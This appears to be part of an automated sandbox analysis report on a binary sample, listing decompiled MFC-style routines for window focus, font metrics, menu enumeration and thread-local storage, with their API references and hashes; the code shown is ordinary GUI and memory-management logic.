      • Opcode ID: a1e2b01dc016bbf550fc7650c08fe686947fed8f0b576213796eb4c52eec7622
      • Instruction ID: ae5c2e52ef66432276d5e2223e85637f677e6da86ba0473c7bbcb97709fbebdf
      • Opcode Fuzzy Hash: a1e2b01dc016bbf550fc7650c08fe686947fed8f0b576213796eb4c52eec7622
      • Instruction Fuzzy Hash: 54619172900415AFCF01EBA8CD59EFEBBB9EF4A310F140459F556B72A2DA359E04CB60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AE4BA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 69windowCOMMON
      Download Yara Rule
      C-Code - Quality: 93%
      			E009AE4BA(void* __ebx, void* __ecx, void* __edx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				void* __edi;
				void* _t12;
				void* _t14;
				void* _t15;
				void* _t18;
				void* _t19;
				void* _t29;
				struct HWND__* _t30;
				signed int _t34;
				void* _t36;
				void* _t38;
				void* _t42;

				_t36 = __edx;
				_t29 = __ebx;
				_push(__ecx);
				_t38 = __ecx;
				_t12 = E009AE492(__ecx, __ecx);
				_t34 = _a4 & 0x0000fff0;
				_t42 = _t12;
				_t14 = _t34 - 0xf040;
				if(_t14 == 0) {
					L11:
					if(_a8 != 0x75 || _t42 == 0) {
						L15:
						_t15 = 0;
						goto L16;
					} else {
						E009B0E11(_t29, _t42, _t36);
						L14:
						_t15 = 1;
						L16:
						return _t15;
					}
				}
				_t18 = _t14 - 0x10;
				if(_t18 == 0) {
					goto L11;
				}
				_t19 = _t18 - 0x10;
				if(_t19 == 0 || _t19 == 0xa0) {
					if(_t34 == 0xf060 || _a8 != 0) {
						if(_t42 != 0) {
							_push(_t29);
							_t30 =  *(_t38 + 0x20);
							_v8 = GetFocus();
							E009AC90B(_t30, _t34, _t36, SetActiveWindow( *(_t42 + 0x20)));
							SendMessageA( *(_t42 + 0x20), 0x112, _a4, _a8);
							if(IsWindow(_t30) != 0) {
								SetActiveWindow(_t30);
							}
							if(IsWindow(_v8) != 0) {
								SetFocus(_v8);
							}
						}
					}
					goto L14;
				} else {
					goto L15;
				}
			}
















      0x009ae4ba
      0x009ae4ba
      0x009ae4bf
      0x009ae4c2
      0x009ae4c4
      0x009ae4cc
      0x009ae4d2
      0x009ae4d6
      0x009ae4db
      0x009ae55b
      0x009ae560
      0x009ae572
      0x009ae572
      0x00000000
      0x009ae566
      0x009ae568
      0x009ae56d
      0x009ae56f
      0x009ae574
      0x009ae577
      0x009ae577
      0x009ae560
      0x009ae4dd
      0x009ae4e0
      0x00000000
      0x00000000
      0x009ae4e2
      0x009ae4e5
      0x009ae4f8
      0x009ae502
      0x009ae504
      0x009ae505
      0x009ae517
      0x009ae51d
      0x009ae530
      0x009ae541
      0x009ae544
      0x009ae544
      0x009ae54e
      0x009ae553
      0x009ae553
      0x009ae54e
      0x009ae502
      0x00000000
      0x00000000
      0x00000000
      0x00000000

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$ActiveFocus$MessageSend
      • String ID: u
      • API String ID: 1556911595-4067256894
      • Opcode ID: ca8d35279ee249f9f95c3bea03f4d0e4b90fac649579fe26d1b611fc973b5356
      • Instruction ID: c46651232cd62a2ae13353ad0de03c8b7602a6a50b45dff77c0c1af94f4b8082
      • Opcode Fuzzy Hash: ca8d35279ee249f9f95c3bea03f4d0e4b90fac649579fe26d1b611fc973b5356
      • Instruction Fuzzy Hash: 4F110872D00209A7CF34AB79ED08A6E7BADEF86318B085921F90296575E634CE10DBD0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009C964E Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64COMMON
      Download Yara Rule
      C-Code - Quality: 95%
      			E009C964E(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E00AAB46A(E009C94FB(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

















      0x009c9656
      0x009c965d
      0x009c9662
      0x009c966b
      0x009c966e
      0x009c9671
      0x009c9676
      0x009c967a
      0x009c9684
      0x009c9693
      0x009c9697
      0x009c96a4
      0x009c96a6
      0x009c96a8
      0x009c96a8
      0x009c96c3
      0x009c96c6
      0x009c96c6
      0x009c96cc
      0x009c96cc
      0x009c96d2
      0x009c96d4
      0x009c96d4
      0x009c96ef
      0x009c96ef
      0x009c967e
      0x009c9682
      0x00000000
      0x00000000
      0x00000000

      APIs
      • GetStockObject.GDI32(00000011), ref: 009C9676
      • GetStockObject.GDI32(0000000D), ref: 009C967E
      • GetObjectA.GDI32(00000000,0000003C,?), ref: 009C968B
      • GetDC.USER32(00000000), ref: 009C969A
      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009C96AE
      • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 009C96BA
      • ReleaseDC.USER32 ref: 009C96C6
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Object$Stock$CapsDeviceRelease
      • String ID: System
      • API String ID: 46613423-3470857405
      • Opcode ID: 40d30bc896670c4f4d7b24fe929149bf82d986ddd204b1f9a8dea0baaa97398a
      • Instruction ID: 7f5b4562238ced3b5d2f35aa1000d2b3e93639188ce2b5929bf2c6e1cebb1448
      • Opcode Fuzzy Hash: 40d30bc896670c4f4d7b24fe929149bf82d986ddd204b1f9a8dea0baaa97398a
      • Instruction Fuzzy Hash: 53119171A01218EBEB10DBA4DD49FAE7B78EF45745F00001AFA06A71D1DB719D06CB71
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A79BF Relevance: 13.6, APIs: 9, Instructions: 150windowCOMMON
      Download Yara Rule
      C-Code - Quality: 90%
      			E009A79BF(int* __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				struct HMENU__* _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t57;
				struct HMENU__* _t61;
				int _t62;
				int _t63;
				struct HMENU__* _t64;
				int _t66;
				signed int _t71;
				int _t72;
				struct HMENU__* _t73;
				struct HMENU__* _t74;
				int _t75;
				int* _t79;
				struct HMENU__* _t80;
				int _t81;
				int _t82;
				void* _t87;
				struct HMENU__* _t88;
				intOrPtr _t90;

				_t83 = __ecx;
				_t80 = __ecx;
				_v8 = __ecx;
				_t57 = E009BBC7B(__ecx[8]);
				if(_a12 == 0) {
					_t90 = _a4;
					if(__ecx[0x28] == 0) {
						L3:
						_t95 = _t90;
						if(_t90 == 0) {
							E009B8782(_t83);
						}
						_t84 =  &_v48;
						E009B056D( &_v48);
						_v36 = _t90;
						if( *((intOrPtr*)(E009BD1B0(_t80, 0, _t90, _t95) + 0x78)) !=  *(_t90 + 4)) {
							__eflags =  *((intOrPtr*)(_t80 + 0xf4)) - 1;
							if( *((intOrPtr*)(_t80 + 0xf4)) != 1) {
								_t61 =  *(_t80 + 0xf8);
							} else {
								_t61 = GetMenu( *(_t80 + 0x20));
							}
							__eflags = _t61;
							if(__eflags == 0) {
								goto L20;
							} else {
								_t84 = _t80;
								_t73 = E009AE492(_t80, 0);
								__eflags = _t73;
								if(__eflags == 0) {
									goto L20;
								}
								_t85 = _t73->i;
								_t84 = _t73;
								_t74 =  *((intOrPtr*)(_t73->i + 0x6c))();
								__eflags = _t74;
								if(__eflags == 0) {
									goto L20;
								}
								_t88 =  *(_t74 + 4);
								__eflags = _t88;
								if(__eflags == 0) {
									goto L20;
								}
								_t75 = GetMenuItemCount(_t88);
								_t82 = 0;
								_a12 = _t75;
								__eflags = _t75;
								if(__eflags <= 0) {
									L19:
									_t80 = _v8;
									goto L20;
								} else {
									goto L15;
								}
								while(1) {
									L15:
									__eflags = GetSubMenu(_t88, _t82) -  *(_t90 + 4);
									if(__eflags == 0) {
										break;
									}
									_t82 = _t82 + 1;
									__eflags = _t82 - _a12;
									if(__eflags < 0) {
										continue;
									}
									goto L19;
								}
								_v12 = E009BC05D(_t82, _t84, _t85, _t88, _t90, __eflags, _t88);
								goto L19;
							}
						} else {
							_v12 = _t90;
							L20:
							_t62 = GetMenuItemCount( *(_t90 + 4));
							_v40 = _v40 & 0x00000000;
							_v16 = _t62;
							if(_t62 == 0) {
								L40:
								return _t62;
							}
							_t87 = GetMenuItemID;
							do {
								_t63 = GetMenuItemID( *(_t90 + 4), _v40);
								_v44 = _t63;
								if(_t63 == 0) {
									goto L39;
								}
								_t99 = _t63 - 0xffffffff;
								if(_t63 != 0xffffffff) {
									_v32 = _v32 & 0x00000000;
									__eflags =  *(_t80 + 0x74);
									if( *(_t80 + 0x74) == 0) {
										L31:
										_t64 = 0;
										__eflags = 0;
										L32:
										_push(_t64);
										L33:
										_push(_t80);
										_t84 =  &_v48;
										E009B0593( &_v48);
										_t66 = GetMenuItemCount( *(_t90 + 4));
										_t81 = _t66;
										if(_t81 >= _v16) {
											L38:
											_v16 = _t81;
											_t80 = _v8;
											goto L39;
										}
										_v40 = _v40 + _t66 - _v16;
										while(_v40 < _t81) {
											__eflags = GetMenuItemID( *(_t90 + 4), _v40) - _v44;
											if(__eflags != 0) {
												goto L38;
											}
											_t48 =  &_v40;
											 *_t48 = _v40 + 1;
											__eflags =  *_t48;
										}
										goto L38;
									}
									__eflags = _t63 - 0xf000;
									if(_t63 >= 0xf000) {
										goto L31;
									}
									_t64 = 1;
									goto L32;
								}
								_t71 = E009BC05D(_t80, _t84, _t85, _t87, _t90, _t99, GetSubMenu( *(_t90 + 4), _v40));
								_v32 = _t71;
								if(_t71 == 0) {
									goto L39;
								}
								_t72 = GetMenuItemID( *(_t71 + 4), 0);
								_v44 = _t72;
								if(_t72 != 0 && _t72 != 0xffffffff) {
									_push(0);
									goto L33;
								}
								L39:
								_v40 = _v40 + 1;
								_t62 = _v40;
							} while (_t62 < _v16);
							goto L40;
						}
					}
					_t79 = __ecx[0x28];
					_t85 =  *_t79;
					_t83 = _t79;
					_t62 =  *((intOrPtr*)( *_t79 + 0x74))(_t90, _a8, 0);
					if(_t62 != 0) {
						goto L40;
					}
					goto L3;
				}
				return _t57;
			}

































      0x009a79bf
      0x009a79c8
      0x009a79ce
      0x009a79d1
      0x009a79db
      0x009a79e2
      0x009a79eb
      0x009a7a07
      0x009a7a07
      0x009a7a09
      0x009a7a0b
      0x009a7a0b
      0x009a7a10
      0x009a7a13
      0x009a7a18
      0x009a7a26
      0x009a7a2d
      0x009a7a34
      0x009a7a41
      0x009a7a36
      0x009a7a39
      0x009a7a39
      0x009a7a47
      0x009a7a49
      0x00000000
      0x009a7a4b
      0x009a7a4b
      0x009a7a4d
      0x009a7a52
      0x009a7a54
      0x00000000
      0x00000000
      0x009a7a56
      0x009a7a58
      0x009a7a5a
      0x009a7a5d
      0x009a7a5f
      0x00000000
      0x00000000
      0x009a7a61
      0x009a7a64
      0x009a7a66
      0x00000000
      0x00000000
      0x009a7a69
      0x009a7a6f
      0x009a7a71
      0x009a7a74
      0x009a7a76
      0x009a7a96
      0x009a7a96
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009a7a78
      0x009a7a78
      0x009a7a80
      0x009a7a83
      0x00000000
      0x00000000
      0x009a7a85
      0x009a7a86
      0x009a7a89
      0x00000000
      0x00000000
      0x00000000
      0x009a7a8b
      0x009a7a93
      0x00000000
      0x009a7a93
      0x009a7a28
      0x009a7a28
      0x009a7a99
      0x009a7a9c
      0x009a7aa2
      0x009a7aa6
      0x009a7aab
      0x009a7b63
      0x00000000
      0x009a7b63
      0x009a7ab1
      0x009a7ab7
      0x009a7abd
      0x009a7abf
      0x009a7ac4
      0x00000000
      0x00000000
      0x009a7aca
      0x009a7acd
      0x009a7aff
      0x009a7b03
      0x009a7b07
      0x009a7b15
      0x009a7b15
      0x009a7b15
      0x009a7b17
      0x009a7b17
      0x009a7b18
      0x009a7b18
      0x009a7b19
      0x009a7b1c
      0x009a7b24
      0x009a7b2a
      0x009a7b2f
      0x009a7b4e
      0x009a7b4e
      0x009a7b51
      0x00000000
      0x009a7b51
      0x009a7b34
      0x009a7b49
      0x009a7b41
      0x009a7b44
      0x00000000
      0x00000000
      0x009a7b46
      0x009a7b46
      0x009a7b46
      0x009a7b46
      0x00000000
      0x009a7b49
      0x009a7b09
      0x009a7b0e
      0x00000000
      0x00000000
      0x009a7b12
      0x00000000
      0x009a7b12
      0x009a7adc
      0x009a7ae1
      0x009a7ae6
      0x00000000
      0x00000000
      0x009a7aed
      0x009a7aef
      0x009a7af4
      0x009a7afb
      0x00000000
      0x009a7afb
      0x009a7b54
      0x009a7b54
      0x009a7b57
      0x009a7b5a
      0x00000000
      0x009a7ab7
      0x009a7a26
      0x009a79ed
      0x009a79f3
      0x009a79f9
      0x009a79fc
      0x009a7a01
      0x00000000
      0x00000000
      0x00000000
      0x009a7a01
      0x009a7b67

      APIs
        • Part of subcall function 009BBC7B: GetFocus.USER32(?,?,009A632A,?), ref: 009BBC81
        • Part of subcall function 009BBC7B: GetParent.USER32(00000000), ref: 009BBCA9
        • Part of subcall function 009BBC7B: GetWindowLongA.USER32 ref: 009BBCC4
        • Part of subcall function 009BBC7B: GetParent.USER32(?), ref: 009BBCD2
        • Part of subcall function 009BBC7B: GetDesktopWindow.USER32 ref: 009BBCD6
        • Part of subcall function 009BBC7B: SendMessageA.USER32 ref: 009BBCEA
      • GetMenu.USER32(?), ref: 009A7A39
      • GetMenuItemCount.USER32 ref: 009A7A69
      • GetSubMenu.USER32 ref: 009A7A7A
      • GetMenuItemCount.USER32 ref: 009A7A9C
      • GetMenuItemID.USER32(?,00000000), ref: 009A7ABD
      • GetSubMenu.USER32 ref: 009A7AD5
      • GetMenuItemID.USER32(?,00000000), ref: 009A7AED
      • GetMenuItemCount.USER32 ref: 009A7B24
      • GetMenuItemID.USER32(?,00000000), ref: 009A7B3F
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
      • String ID:
      • API String ID: 4186786570-0
      • Opcode ID: e3679856c9da57c173a90424e0550af4301ec7f42f89609db429a909d84a1dd8
      • Instruction ID: 13ba374afd8f4e210a780f9ee758ddfc7bc9e1c84f8d1d5988375b7e1504eef3
      • Opcode Fuzzy Hash: e3679856c9da57c173a90424e0550af4301ec7f42f89609db429a909d84a1dd8
      • Instruction Fuzzy Hash: 63516B70A04206EBCF11DFE4CD86AAEF7B9FF8A311F244965E426A6151D731DE41CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009BCB7A Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 83%
      			E009BCB7A(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E00AAD265(0xac8a93, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E009BC82A(0x10);
						__eflags = _t39;
						if(_t39 == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0xada330;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						_t51 =  &(_t62[5]);
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E009BC942( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							_t75 =  *(_t65 + 0xc);
							if( *(_t65 + 0xc) != 0) {
								_t41 = E009B9E19(0, _t51, _t62, _t65, __eflags, _t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E009B9E19(0, _t51, _t62, _t65, _t75, _t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E009B874A(_t53);
							}
							 *(_t65 + 0xc) = _t42;
							E00AAB3F0(_t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					_push( *(_t66 - 0x14));
				}
				LeaveCriticalSection();
				return E00AAD30A(_t36);
			}














      0x009bcb7a
      0x009bcb81
      0x009bcb86
      0x009bcb88
      0x009bcb8b
      0x009bcb8f
      0x009bcb92
      0x009bcb98
      0x009bcb9f
      0x009bcca0
      0x009bcbae
      0x009bcbb6
      0x009bcbba
      0x009bcbee
      0x009bcbf1
      0x009bcbf6
      0x009bcbf8
      0x009bcc04
      0x009bcc04
      0x009bcbfa
      0x009bcbfa
      0x009bcc00
      0x009bcc00
      0x009bcc06
      0x009bcc0b
      0x009bcc0e
      0x009bcc11
      0x009bcc14
      0x00000000
      0x009bcbbc
      0x009bcbbc
      0x009bcbc2
      0x009bcbd1
      0x009bcbd1
      0x009bcbd4
      0x009bcc38
      0x009bcc3e
      0x009bcc43
      0x009bcbd6
      0x009bcbdb
      0x009bcbe1
      0x009bcbe4
      0x009bcbe4
      0x009bcc4b
      0x009bcc50
      0x009bcc56
      0x009bcc56
      0x009bcc5e
      0x009bcc6f
      0x009bcc7b
      0x009bcc80
      0x009bcc86
      0x009bcc86
      0x009bcbc2
      0x009bcc89
      0x009bcc8e
      0x009bcc98
      0x009bcc98
      0x009bcc9b
      0x009bcc9b
      0x009bcca1
      0x009bccac

      APIs
      • __EH_prolog3_catch.LIBCMT ref: 009BCB81
      • EnterCriticalSection.KERNEL32(?,00000010,009BCE3D,?,00000000,?,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA,00000004,009A4418), ref: 009BCB92
      • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA,00000004,009A4418), ref: 009BCBB0
      • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009BCBE4
      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA,00000004,009A4418), ref: 009BCC50
      • _memset.LIBCMT ref: 009BCC6F
      • TlsSetValue.KERNEL32(?,00000000), ref: 009BCC80
      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA,00000004,009A4418), ref: 009BCCA1
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
      • String ID:
      • API String ID: 1891723912-0
      • Opcode ID: 29a76459a90c44f763eaed1862b8e449e17a541c742670e1bf2280ddf21b7f2f
      • Instruction ID: 56824585d56a5061414f0a2e73340280351fef2df43fb02e404d57bf531ef7b5
      • Opcode Fuzzy Hash: 29a76459a90c44f763eaed1862b8e449e17a541c742670e1bf2280ddf21b7f2f
      • Instruction Fuzzy Hash: CF3192B0400606EFCB20EF64DA89EAABBB4FF54320710C92EF55B9B551CB31AD51CB90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B4386 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115threadwindowCOMMON
      Download Yara Rule
      C-Code - Quality: 81%
      			E009B4386(void* __ecx, void* __edx, void* __eflags, signed int _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v9;
				char _v268;
				struct HWND__* _v272;
				signed int _v276;
				long _v280;
				struct HWND__* _v284;
				intOrPtr _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t36;
				signed int _t53;
				intOrPtr _t56;
				long _t59;
				struct HWND__* _t62;
				CHAR* _t63;
				void* _t64;
				void* _t66;
				void* _t70;
				void* _t71;
				signed int _t72;
				void* _t74;
				void* _t75;
				signed int _t77;
				void* _t78;
				signed int _t82;

				_t70 = __edx;
				_t80 = _t82;
				_t36 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t36 ^ _t82;
				_t72 = _a4;
				_t77 = 0;
				_v288 = _a8;
				E009B4299(0);
				_t66 = _t71;
				_t62 = E009B42D4(0,  &_v272);
				_v284 = _t62;
				if(_t62 != _v272) {
					EnableWindow(_t62, 1);
				}
				_v280 = _v280 & _t77;
				GetWindowThreadProcessId(_t62,  &_v280);
				if(_t62 == 0 || _v280 != GetCurrentProcessId()) {
					L7:
					__eflags = _t72;
					if(__eflags != 0) {
						_t77 = _t72 + 0x7c;
					}
					goto L9;
				} else {
					_t59 = SendMessageA(_t62, 0x376, 0, 0);
					if(_t59 == 0) {
						goto L7;
					} else {
						_t77 = _t59;
						L9:
						_v276 = _v276 & 0x00000000;
						if(_t77 != 0) {
							_v276 =  *_t77;
							_t56 = _a16;
							if(_t56 != 0) {
								 *_t77 = _t56 + 0x30000;
							}
						}
						if((_a12 & 0x000000f0) == 0) {
							_t53 = _a12 & 0x0000000f;
							if(_t53 <= 1) {
								_t23 =  &_a12;
								 *_t23 = _a12 | 0x00000030;
								__eflags =  *_t23;
							} else {
								if(_t53 + 0xfffffffd <= 1) {
									_a12 = _a12 | 0x00000020;
								}
							}
						}
						_v268 = 0;
						_t97 = _t72;
						if(_t72 == 0) {
							_t63 =  &_v268;
							__eflags = GetModuleFileNameA(0, _t63, 0x104) - 0x104;
							if(__eflags == 0) {
								_v9 = 0;
							}
						} else {
							_t63 =  *(_t72 + 0x50);
						}
						_push(_a12);
						_push(_t63);
						_push(_v288);
						_push(_v284);
						_t74 = E009AB656(_t66, _t77, _t97);
						if(_t77 != 0) {
							 *_t77 = _v276;
						}
						if(_v272 != 0) {
							EnableWindow(_v272, 1);
						}
						E009B4299(1);
						_pop(_t75);
						_pop(_t78);
						_pop(_t64);
						return E00AAB46A(_t74, _t64, _v8 ^ _t80, _t70, _t75, _t78);
					}
				}
			}































      0x009b4386
      0x009b4389
      0x009b4391
      0x009b4398
      0x009b43a1
      0x009b43a4
      0x009b43a7
      0x009b43ad
      0x009b43b2
      0x009b43c0
      0x009b43c2
      0x009b43ce
      0x009b43d3
      0x009b43d3
      0x009b43d9
      0x009b43e7
      0x009b43ef
      0x009b4417
      0x009b4417
      0x009b4419
      0x009b441b
      0x009b441b
      0x00000000
      0x009b43ff
      0x009b4409
      0x009b4411
      0x00000000
      0x009b4413
      0x009b4413
      0x009b441e
      0x009b441e
      0x009b4427
      0x009b442b
      0x009b4431
      0x009b4436
      0x009b443d
      0x009b443d
      0x009b4436
      0x009b4443
      0x009b4448
      0x009b444e
      0x009b445e
      0x009b445e
      0x009b445e
      0x009b4450
      0x009b4456
      0x009b4458
      0x009b4458
      0x009b4456
      0x009b444e
      0x009b4462
      0x009b4469
      0x009b446b
      0x009b4472
      0x009b4489
      0x009b448b
      0x009b448d
      0x009b448d
      0x009b446d
      0x009b446d
      0x009b446d
      0x009b4491
      0x009b4494
      0x009b4495
      0x009b449b
      0x009b44a9
      0x009b44ad
      0x009b44b5
      0x009b44b5
      0x009b44be
      0x009b44c8
      0x009b44c8
      0x009b44d0
      0x009b44db
      0x009b44dc
      0x009b44df
